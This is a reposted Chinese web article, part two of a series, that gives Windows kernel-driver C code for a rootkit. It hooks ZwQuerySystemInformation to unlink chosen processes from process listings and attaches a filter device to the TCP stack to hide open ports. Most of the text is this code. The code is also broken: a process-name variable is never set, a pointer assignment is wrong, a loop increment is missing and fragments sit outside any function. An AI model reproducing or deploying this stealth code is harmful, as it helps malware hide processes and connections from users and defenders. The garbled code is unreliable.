隐藏任意进程,目录/文档,注册表,端口(2)

NTSTATUS HookZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength)
{
NTSTATUS rc;

ANSI_STRING process_name,process_uname,process_name1,process_name2;
BOOL g_hide_proc = TRUE;
CHAR aProcessName[80];
PP_DIR ptr;
int found;

// 执行旧的ZwQuerySystemInformation函数

rc = ((ZWQUERYSYSTEMINFORMATION)(OldZwQuerySystemInformation))(SystemInformationClass,
SystemInformation,SystemInformationLength,ReturnLength );

if(NT_SUCCESS(rc ))
{
if( g_hide_proc && (5 == SystemInformationClass))
{
// 将查找出来结果赋给结构
struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES *)SystemInformation;
struct _SYSTEM_PROCESSES *prev = NULL;

// 遍历进程
while(curr)
{
if((0 < process_name.Length) && (255 > process_name.Length))
{
found=0;
// 遍历链表
for(ptr=list_head;ptr!=NULL;ptr=ptr->next )
{
if(ptr->flag != PTR_HIDEPROC) continue ;
if(memcmp(process_name.Buffer,ptr->name,strlen(ptr->name)) == 0)
{
found =1;
}
}

// 判断假如是隐藏进程名则覆盖掉此进程名
while(found)
{
if(prev)
{
if(curr->NextEntryDelta)
{
prev->NextEntryDelta = curr->NextEntryDelta;
}
else
{
prev->NextEntryDelta = 0;
}
}
else
{
if(curr->NextEntryDelta)
{
(char *)SystemInformation = curr->NextEntryDelta;
}
else
{
SystemInformation = NULL;
}
}
if(curr->NextEntryDelta)
((char *)curr = curr->NextEntryDelta);
else
{
curr = NULL;break;
}
// 遍历链表
found = 0;
for (ptr=list_head;ptr!=NULL;ptr=ptr->next )
{
if (ptr->flag != PTR_HIDEPROC) continue ;
if (memcmp(process_name.Buffer,ptr->name,strlen(ptr->name)) == 0)
{
found = 1;
}
}
}
}
if(curr != NULL)
{
prev = curr;
if(curr->NextEntryDelta) ((char *)curr = curr->NextEntryDelta);
else curr = NULL;
}
}
}
}
return(rc);
}



//隐藏端口

PDEVICE_OBJECT m_TcpgetDevice;
PDEVICE_OBJECT TcpDevice;
UNICODE_STRING TcpDeviceName;
PDRIVER_OBJECT TcpDriver;
PDEVICE_OBJECT TcpgetDevice;
PDEVICE_OBJECT FilterDevice
PDRIVER_DISPATCH Empty;
NTSTATUS status;

Empty = DriverObject->MajorFunction[IRP_MJ_CREATE];
RtlInitUnicodeString( &TcpDeviceName, L"\\Device\\Tcp");

//得到已有的设备指针

status = IoGetDeviceObjectPointer( &TcpDeviceName,FILE_ALL_ACCESS,&FileObject,&TcpDevice);

if(!NT_SUCCESS(status))
{
DbgPrint("IoGetDeviceObjectPointer error!\n");
return status;
}

DbgPrint("IoGetDeviceObjectPointer ok!\n");

// 建立设备
status = IoCreateDevice( DriverObject,sizeof(DEVICE_EXTENSION),NULL,
FILE_DEVICE_UNKNOWN,0,FALSE,&FilterDevice);
if(!NT_SUCCESS(status))
{
return status;
}

// 加入设备

TcpgetDevice = IoAttachDeviceToDeviceStack( FilterDevice, TcpDevice);

if(!TcpgetDevice)
{
IoDeleteDevice(FilterDevice);
DbgPrint("IoAttachDeviceToDeviceStack error!\n");
return STATUS_SUCCESS;
}

m_TcpgetDevice = TcpgetDevice;

// 加到过滤函数中处理
for(i=0;i<IRP_MJ_MAXIMUM_FUNCTION;i )
{
if((TcpDriver->MajorFunction[i]!=Empty)&&(DriverObject->MajorFunction[i]==Empty))
{
DriverObject->MajorFunction[i] = PassThrough;
}
}

ObDereferenceObject(FileObject);

NTSTATUS PassThrough( IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp )
{
NTSTATUS status;
PIO_STACK_LOCATION pIrpStack;
pIrpStack = IoGetCurrentIrpStackLocation( Irp );

//如是查询则完成 IRP
if ( pIrpStack->Parameters.DeviceIoControl.IoControlCode == QUERY_INFORMATION_EX)
{
//这里能够近一步判断某个端口
Irp->IoStatus.Status=STATUS_SUCCESS;
IoCompleteRequest(Irp,IO_NO_INCREMENT);
return STATUS_SUCCESS;
}

//复制当前 IRP
IoCopyCurrentIrpStackLocationToNext(Irp);
IoSetCompletionRoutine( Irp,GenericCompletion,NULL,TRUE,TRUE,TRUE);

//传递
return IoCallDriver( m_TcpgetDevice, Irp);

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有